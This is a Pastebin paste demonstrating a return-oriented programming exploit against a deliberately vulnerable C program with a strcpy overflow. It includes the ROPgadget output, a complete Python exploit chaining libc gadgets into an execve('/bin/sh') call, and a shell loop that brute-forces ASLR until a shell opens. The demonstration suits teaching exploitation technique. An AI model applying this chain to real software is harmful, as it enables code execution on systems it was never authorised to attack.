SHARE
TWEET

Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO

a guest Dec 1st, 2011 2,544 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO
  2.  
  3.  
  4. Simple binary vuln:
  5.  
  6. [jonathan@Archlinux rop-bf]$ cat main.c
  7. #include <stdio.h>
  8. #include <string.h>
  9. #include <stdlib.h>
  10.  
  11. int main(int argc, char **argv)
  12. {
  13.   char buff[32];
  14.  
  15.   strcpy(buff, argv[1]);
  16.  
  17.   return (0);
  18. }
  19.  
  20. Compiled with "gcc -o main main.c -pie"
  21.  
  22. PIE    Enable
  23. ASLR   Enable
  24. NX     Enable
  25. RELRO  Full
  26.  
  27.  
  28. Search gadget with ROPgadget
  29.  
  30. [jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
  31. Gadgets information
  32. ============================================================
  33. 0x000003e6: pop %edi | ret
  34. 0x00000405: add $0x08,%esp | pop %ebx | ret
  35. 0x00000408: pop %ebx | ret
  36. 0x00000492: mov (%esp),%ebx | ret
  37. 0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
  38. 0x0000051e: pop %ebp | ret
  39. 0x0000054f: call *%eax
  40. 0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
  41. 0x00000554: pop %ebx | pop %ebp | ret
  42. 0x00000595: mov $0x81ffffff,%esi | ret
  43. 0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
  44.  
  45. Unique gadgets found: 11
  46.  
  47.  
  48. Fuck just 11 gadgets found. :/
  49.  
  50.  
  51. So, we search gadget in /lib/libc.so.6 and we bruteforce the base address
  52.  
  53.  
  54. Exploit:
  55.  
  56. [jonathan@Archlinux rop-bf]$ cat exploit.py
  57. #!/usr/bin/python2
  58.  
  59. from struct import pack
  60.  
  61. base_addr = 0xb770a000
  62.  
  63. p = "a" * 44
  64. # execve /bin/sh generated by RopGadget v3.3
  65. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  66. p += pack("<I", 0x42424242) # padding
  67. p += pack("<I", base_addr + 0x00178020)  # @ .data
  68. p += pack("<I", 0x42424242) # padding
  69. p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
  70. p += "/bin"
  71. p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
  72. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  73. p += pack("<I", 0x42424242) # padding
  74. p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
  75. p += pack("<I", 0x42424242) # padding
  76. p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
  77. p += "//sh"
  78. p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
  79. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  80. p += pack("<I", 0x42424242) # padding
  81. p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
  82. p += pack("<I", 0x42424242) # padding
  83. p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
  84. p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
  85. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  86. p += pack("<I", 0x42424242) # padding
  87. p += pack("<I", 0x42424242) # padding
  88. p += pack("<I", base_addr + 0x00178020) # @ .data
  89. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  90. p += pack("<I", 0x42424242) # padding
  91. p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
  92. p += pack("<I", base_addr + 0x00178020) # @data
  93. p += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret
  94. p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
  95. p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
  96. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  97. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  98. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  99. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  100. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  101. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  102. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  103. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  104. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  105. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  106. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  107. p += pack("<I", base_addr + 0x0002dc45) # int $0x80
  108.  
  109. print p
  110.  
  111.  
  112.  
  113. Ok let's go bruteforce:
  114.  
  115.  
  116. [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
  117. Segmentation fault
  118. Segmentation fault
  119. Segmentation fault
  120. Segmentation fault
  121. Segmentation fault
  122. [...]
  123. Segmentation fault
  124. Segmentation fault
  125. Segmentation fault
  126. Segmentation fault
  127. Segmentation fault
  128. Segmentation fault
  129. Segmentation fault
  130. sh-4.2$
  131.  
  132. New feature in future ropgadget: ROPmaker for bruteforce Libc
  133.  
  134.  
  135. - http://shell-storm.org/project/ROPgadget/
  136.  
  137. @jonathansalwan
  138.  
  139.  
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top